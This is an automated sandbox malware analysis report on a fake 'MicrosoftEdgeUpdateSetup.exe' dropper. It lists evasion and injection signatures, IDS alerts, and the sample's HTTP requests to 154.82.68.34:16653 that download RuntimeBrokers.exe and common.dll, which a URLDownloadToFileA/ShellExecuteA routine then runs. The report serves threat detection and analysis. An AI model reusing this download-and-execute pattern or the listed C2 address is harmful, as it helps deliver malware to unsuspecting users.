Windows Analysis Report
MicrosoftEdgeUpdateSetup.exe

Overview

General Information

Sample name: MicrosoftEdgeUpdateSetup.exe
Analysis ID: 1579412
MD5: e0596bfb4ce5773932f2c2047e2de77b
SHA1: 41120d88d333fad440718a288f29920f040cd832
SHA256: 74a4f68219998688ddd9e14d4a10c6c451cbd77f91f7ea0e27f8dd17f70eeaa9
Tags: exeuser-smica83
Infos:

Detection

Score: 60
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Suricata IDS alerts for network traffic
AI detected suspicious sample
Found evasive API chain checking for user administrative privileges
Uses known network protocols on non-standard ports
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to communicate with device drivers
Contains functionality to download and execute PE files
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains sections with non-standard names
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection
barindex
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 97.6% probability
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_6C0C6642 CryptReleaseContext, 1_2_6C0C6642
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_6C0C6688 CryptReleaseContext, 1_2_6C0C6688
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_6C0C60AA __EH_prolog3_GS,CryptAcquireContextW,GetLastError, 1_2_6C0C60AA
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_6C157C31 ?VerifyCertInfo@Sys_wrapper@common@ierd_tgp@@SA_NPB_W@Z,__EH_prolog3_GS,memset,memset,lstrcpyW,CryptQueryObject,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,CryptMsgGetParam,CertFindCertificateInStore,CertGetNameStringA,LocalAlloc,CertGetNameStringW,?get_log_instance@base@@YAPAVILogger@1@XZ,?get_log_instance@base@@YAPAVILogger@1@XZ,GetLastError,LocalFree,?get_log_instance@base@@YAPAVILogger@1@XZ,?get_log_instance@base@@YAPAVILogger@1@XZ,GetLastError,?get_log_instance@base@@YAPAVILogger@1@XZ,GetLastError,?get_log_instance@base@@YAPAVILogger@1@XZ,GetLastError,LocalFree,CertFreeCertificateContext,?get_log_instance@base@@YAPAVILogger@1@XZ,?get_log_instance@base@@YAPAVILogger@1@XZ,GetLastError,?get_log_instance@base@@YAPAVILogger@1@XZ,GetLastError,CertCloseStore,CryptMsgClose, 1_2_6C157C31
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_6C0C381C ?SymEnCrypt@CSymmetryString@ieg_common@@SA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@0PAV34@@Z,?qq_symmetry_encrypt3_len@@YAHH@Z,?oi_symmetry_encrypt2@@YAXPBEH0PAEPAH@Z, 1_2_6C0C381C
Source: RuntimeBrokers.exe, 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: -----BEGIN PUBLIC KEY----- memstr_da8f9787-6
Uses 32bit PE files
Source: MicrosoftEdgeUpdateSetup.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: MicrosoftEdgeUpdateSetup.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: D:\ci_dev\wegame_client\build\bin\Release\tcls_core.pdb source: RuntimeBrokers.exe, 00000001.00000002.2954625279.000000000052E000.00000002.00000001.01000000.00000006.sdmp, RuntimeBrokers.exe, 00000001.00000000.1830246021.000000000052E000.00000002.00000001.01000000.00000006.sdmp, RuntimeBrokers[1].exe.0.dr, RuntimeBrokers.exe.0.dr
Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 /WX -DL_ENDIAN -DOPENSSL_PIC -D_WIN32_WINNT=0x0501 source: RuntimeBrokers.exe, 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmp, common[1].dll.0.dr, common.dll.0.dr
Source: Binary string: keyfuncencryptionPBE2PARAMkeylengthprfPBKDF2PARAMcrypto\asn1\p5_pbev2.ccrypto\evp\p5_crpt2.cassertion failed: keylen <= sizeof(key)crypto\hmac\hmac.ccrypto\pkcs12\p12_key.cxn--compiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 /WX -DL_ENDIAN -DOPENSSL_PIC -D_WIN32_WINNT=0x0501 source: common[1].dll.0.dr, common.dll.0.dr
Source: Binary string: mi_exe_stub.pdb source: MicrosoftEdgeUpdateSetup.exe
Source: Binary string: D:\ci_dev\wegame_client\build\lib\Release\common.pdb source: RuntimeBrokers.exe, 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmp, common[1].dll.0.dr, common.dll.0.dr
Source: Binary string: #lkeyfuncencryptionPBE2PARAMkeylengthprfPBKDF2PARAMcrypto\asn1\p5_pbev2.ccrypto\evp\p5_crpt2.cassertion failed: keylen <= sizeof(key)crypto\hmac\hmac.ccrypto\pkcs12\p12_key.cxn--compiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 /WX -DL_ENDIAN -DOPENSSL_PIC -D_WIN32_WINNT=0x0501 source: RuntimeBrokers.exe, 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmp
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Code function: 0_2_0016207E FindFirstFileW,GetSystemTimeAsFileTime,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 0_2_0016207E
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Code function: 0_2_0016231F FindFirstFileExW,GetSystemTimeAsFileTime,FindNextFileW,FindClose, 0_2_0016231F
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_00484A62 FindFirstFileW,MoveFileExW,CopyFileW,FindNextFileW,FindClose, 1_2_00484A62
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_0046CDBA FindFirstFileW,_wcsrchr,_wcsrchr,DeleteFileW,FindNextFileW,FindClose, 1_2_0046CDBA
Source: C:\Users\user\AppData\Roaming\RuntimeBrokers.exe Code function: 1_2_00468440 GetLogicalDriveStringsW,QueryDosDeviceW, 1_2_00468440

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2022050 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 : 154.82.68.34:16653 -> 192.168.2.4:49730
Source: Network traffic Suricata IDS: 2022051 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 : 154.82.68.34:16653 -> 192.168.2.4:49730
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 16653
Source: unknown Network traffic detected: HTTP traffic on port 16653 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 16653
Source: unknown Network traffic detected: HTTP traffic on port 16653 -> 49730
Contains functionality to download and execute PE files
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Code function: 0_2_00166690 URLDownloadToFileA,URLDownloadToFileA,ShellExecuteA,exit, 0_2_00166690
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.4:49730 -> 154.82.68.34:16653
Source: global traffic TCP traffic: 192.168.2.4:49731 -> 134.122.134.93:8852
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Sun, 22 Dec 2024 07:37:06 GMTContent-Type: application/octet-streamContent-Length: 1770080Last-Modified: Wed, 18 Dec 2024 05:31:28 GMTConnection: keep-aliveETag: "67625e30-1b0260"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8d f6 f8 d8 c9 97 96 8b c9 97 96 8b c9 97 96 8b 7d 0b 67 8b db 97 96 8b 7d 0b 65 8b 74 97 96 8b 7d 0b 64 8b d7 97 96 8b a6 e1 3c 8b ca 97 96 8b a3 ff 93 8a c8 97 96 8b a3 ff 92 8a d9 97 96 8b 57 37 51 8b cf 97 96 8b 9b ff 95 8a d3 97 96 8b 9b ff 93 8a 88 97 96 8b 9b ff 92 8a ea 97 96 8b c0 ef 15 8b ca 97 96 8b 6a fe 97 8a cb 97 96 8b 6a fe 9f 8a ca 97 96 8b c0 ef 05 8b de 97 96 8b c9 97 97 8b cd 96 96 8b 6a fe 93 8a e8 97 96 8b 6a fe 69 8b c8 97 96 8b c9 97 01 8b c8 97 96 8b 6a fe 94 8a c8 97 96 8b 52 69 63 68 c9 97 96 8b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 31 fe 4e 66 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0e 10 00 cc 12 00 00 5e 08 00 00 00 00 00 d8 ef 0a 00 00 10 00 00 00 e0 12 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 50 1b 00 00 04 00 00 21 25 1b 00 02 00 00 81 c0 c6 2d 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 24 49 17 00 04 01 00 00 00 a0 18 00 a0 aa 02 00 00 00 00 00 00 00 00 00 00 da 1a 00 60 28 00 00 00 00 00 00 00 00 00 00 e0 7f 15 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 80 15 00 18 00 00 00 38 80 15 00 40 00 00 00 00 00 00 00 00 00 00 00 00 e0 12 00 40 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 4c ca 12 00 00 10 00 00 00 cc 12 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 88 81 04 00 00 e0 12 00 00 82 04 00 00 d0 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 a8 2f 01 00 00 70 17 00 00 dc 00 00 00 52 17 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 a0 aa 02 00 00 a0 18 00 00 ac 02 00 00 2e 18 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Sun, 22 Dec 2024 07:37:11 GMTContent-Type: application/octet-streamContent-Length: 3925088Last-Modified: Wed, 18 Dec 2024 05:31:28 GMTConnection: keep-aliveETag: "67625e30-3be460"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 b7 47 a4 05 d6 29 f7 05 d6 29 f7 05 d6 29 f7 94 bf 2d f6 9f d4 29 f7 6a a0 83 f7 06 d6 29 f7 6f be 2d f6 15 d6 29 f7 6f be 2c f6 00 d6 29 f7 9b 76 ee f7 0f d6 29 f7 57 be 2d f6 09 d6 29 f7 57 be 2a f6 15 d6 29 f7 57 be 2c f6 27 d6 29 f7 57 be 28 f6 01 d6 29 f7 0c ae aa f7 0d d6 29 f7 95 bf 2c f6 51 d6 29 f7 a6 bf 21 f6 0c d6 29 f7 0c ae ba f7 3a d6 29 f7 05 d6 28 f7 57 d5 29 f7 a6 bf 2d f6 04 d6 29 f7 a6 bf 2c f6 67 d6 29 f7 a6 bf 29 f6 04 d6 29 f7 a6 bf d6 f7 04 d6 29 f7 05 d6 be f7 04 d6 29 f7 a6 bf 2b f6 04 d6 29 f7 52 69 63 68 05 d6 29 f7 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 f6 fd 4e 66 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 10 00 be 29 00 00 64 12 00 00 00 00 00 fa 45 12 00 00 10 00 00 00 d0 29 00 00 00 00 10 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 3c 00 00 04 00 00 c6 fe 3b 00 03 00 40 01 60 e3 16 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 2e 36 00 d4 76 01 00 d4 a4 37 00 a8 02 00 00 00 00 3a 00 d8 1a 00 00 00 00 00 00 00 00 00 00 00 bc 3b 00 60 28 00 00 00 20 3a 00 cc 31 02 00 b0 ea 32 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a8 eb 32 00 18 00 00 00 08 eb 32 00 40 00 00 00 00 00 00 00 00 00 00 00 00 d0 29 00 90 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 cc bc 29 00 00 10 00 00 00 be 29 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 f4 32 0e 00 00 d0 29 00 00 34 0e 00 00 c2 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 30 de 01 00 00 10 38 00 00 76 01 00 00 f6 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 51 4d 47 75 69 64 00 14 00 00 00 00 f0 39 00 00 02 00 00 00 6c 39 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 d0 2e 72 73 72 63 00 00 00 d8 1a 00 00 00 00 3a 00 00 1c 00 00 00 6e 39 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 cc 31 02 00 00 20 3a 00 00 32 02 00 00 8a 39 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: ROOTNETWORKSUS ROOTNETWORKSUS
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /RuntimeBrokers.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 154.82.68.34:16653Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /common.dll HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 154.82.68.34:16653Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 154.82.68.34
Source: unknown TCP traffic detected without corresponding DNS query: 154.82.68.34
Source: unknown TCP traffic detected without corresponding DNS query: 154.82.68.34
Source: unknown TCP traffic detected without corresponding DNS query: 154.82.68.34
Source: unknown TCP traffic detected without corresponding DNS query: 154.82.68.34
Source: unknown TCP traffic detected without corresponding DNS query: 154.82.68.34
Source: unknown TCP traffic detected without corresponding DNS query: 154.82.68.34
Source: unknown TCP traffic detected without corresponding DNS query: 154.82.68.34
Source: unknown TCP traffic detected without corresponding DNS query: 154.82.68.34
Source: unknown TCP traffic detected without corresponding DNS query: 154.82.68.34
Source: unknown TCP traffic detected without corresponding DNS query: 154.82.68.34
Source: unknown TCP traffic detected without corresponding DNS query: 154.82.68.34
Source: unknown TCP traffic detected without corresponding DNS query: 154.82.68.34
Source: unknown TCP traffic detected without corresponding DNS query: 154.82.68.34
Source: unknown TCP traffic detected without corresponding DNS query: 154.82.68.34
Source: unknown TCP traffic detected without corresponding DNS query: 154.82.68.34
Source: unknown TCP traffic detected without corresponding DNS query: 154.82.68.34
Source: unknown TCP traffic detected without corresponding DNS query: 154.82.68.34
Source: unknown TCP traffic detected without corresponding DNS query: 154.82.68.34
Source: unknown TCP traffic detected without corresponding DNS query: 154.82.68.34
Source: unknown TCP traffic detected without corresponding DNS query: 154.82.68.34
Source: unknown TCP traffic detected without corresponding DNS query: 154.82.68.34
Source: unknown TCP traffic detected without corresponding DNS query: 154.82.68.34
Source: unknown TCP traffic detected without corresponding DNS query: 154.82.68.34
Source: unknown TCP traffic detected without corresponding DNS query: 154.82.68.34
Source: unknown TCP traffic detected without corresponding DNS query: 154.82.68.34
Source: unknown TCP traffic detected without corresponding DNS query: 154.82.68.34
Source: unknown TCP traffic detected without corresponding DNS query: 154.82.68.34
Source: unknown TCP traffic detected without corresponding DNS query: 154.82.68.34
Source: unknown TCP traffic detected without corresponding DNS query: 154.82.68.34
Source: unknown TCP traffic detected without corresponding DNS query: 154.82.68.34
Source: unknown TCP traffic detected without corresponding DNS query: 154.82.68.34
Source: unknown TCP traffic detected without corresponding DNS query: 154.82.68.34
Source: unknown TCP traffic detected without corresponding DNS query: 154.82.68.34
Source: unknown TCP traffic detected without corresponding DNS query: 154.82.68.34
Source: unknown TCP traffic detected without corresponding DNS query: 154.82.68.34
Source: unknown TCP traffic detected without corresponding DNS query: 154.82.68.34
Source: unknown TCP traffic detected without corresponding DNS query: 154.82.68.34
Source: unknown TCP traffic detected without corresponding DNS query: 154.82.68.34
Source: unknown TCP traffic detected without corresponding DNS query: 154.82.68.34
Source: unknown TCP traffic detected without corresponding DNS query: 154.82.68.34
Source: unknown TCP traffic detected without corresponding DNS query: 154.82.68.34
Source: unknown TCP traffic detected without corresponding DNS query: 154.82.68.34
Source: unknown TCP traffic detected without corresponding DNS query: 154.82.68.34
Source: unknown TCP traffic detected without corresponding DNS query: 154.82.68.34
Source: unknown TCP traffic detected without corresponding DNS query: 154.82.68.34
Source: unknown TCP traffic detected without corresponding DNS query: 154.82.68.34
Source: unknown TCP traffic detected without corresponding DNS query: 154.82.68.34
Source: unknown TCP traffic detected without corresponding DNS query: 154.82.68.34
Source: unknown TCP traffic detected without corresponding DNS query: 154.82.68.34
Source: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe Code function: 0_2_00166690 URLDownloadToFileA,URLDownloadToFileA,ShellExecuteA,exit, 0_2_00166690
Source: global traffic HTTP traffic detected: GET /RuntimeBrokers.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 154.82.68.34:16653Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /common.dll HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 154.82.68.34:16653Connection: Keep-Alive
Source: MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1765185057.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1828495142.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://154.82.68.34/
Source: MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1765185057.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1828495142.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://154.82.68.34/32
Source: MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1765185057.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdateSetup.exe, 00000000.00000002.1830730229.0000000002BBE000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1828495142.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1765224276.0000000002C39000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1765148514.0000000002C33000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://154.82.68.34:16653/RuntimeBrokers.exe
Source: MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1765185057.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdateSetup.exe, 00000000.00000002.1830730229.0000000002BE3000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1828495142.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://154.82.68.34:16653/RuntimeBrokers.exe)Ce
Source: MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1765185057.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://154.82.68.34:16653/RuntimeBrokers.exe2j
Source: MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1765224276.0000000002C39000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1765148514.0000000002C33000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://154.82.68.34:16653/RuntimeBrokers.exeC:
Source: MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1765185057.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdateSetup.exe, 00000000.00000002.1830730229.0000000002BE3000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1828495142.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://154.82.68.34:16653/RuntimeBrokers.exea
Source: MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1765185057.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://154.82.68.34:16653/RuntimeBrokers.exeg
Source: MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1828443097.0000000002C1C000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1828495142.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://154.82.68.34:16653/common.dll
Source: MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1828495142.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://154.82.68.34:16653/common.dllAppData
Source: MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1828495142.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://154.82.68.34:16653/common.dllFt
Source: MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1828443097.0000000002C1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://154.82.68.34:16653/common.dllS
Source: MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1828404553.0000000002C4F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://154.82.68.34:16653/common.dllSSC:
Source: MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1828495142.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://154.82.68.34:16653/common.dlldllLMEMP
Source: MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1828443097.0000000002C1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://154.82.68.34:16653/common.dlloC:
Source: MicrosoftEdgeUpdateSetup.exe, 00000000.00000002.1830730229.0000000002C18000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1828443097.0000000002C1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://154.82.68.34:16653/common.dllr
Source: common[1].dll.0.dr, RuntimeBrokers[1].exe.0.dr, RuntimeBrokers.exe.0.dr, common.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: common[1].dll.0.dr, RuntimeBrokers[1].exe.0.dr, RuntimeBrokers.exe.0.dr, common.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: common[1].dll.0.dr, RuntimeBrokers[1].exe.0.dr, RuntimeBrokers.exe.0.dr, common.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1828443097.0000000002C3A000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1828495142.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp, common[1].dll.0.dr, RuntimeBrokers[1].exe.0.dr, RuntimeBrokers.exe.0.dr, common.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: common[1].dll.0.dr, RuntimeBrokers[1].exe.0.dr, RuntimeBrokers.exe.0.dr, common.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1765185057.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1765224276.0000000002C39000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdateSetup.exe, 00000000.00000003.1765148514.0000000002C33000.00000004.00000020.00020000.00000000.sdmp, common[1].dll.0.dr, RuntimeBrokers[1].exe.0.dr, RuntimeBrokers.exe.0.dr, common.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: common[1].dll.0.dr, RuntimeBrokers[1].exe.0.dr, RuntimeBrokers.exe.0.dr, common.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: common.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
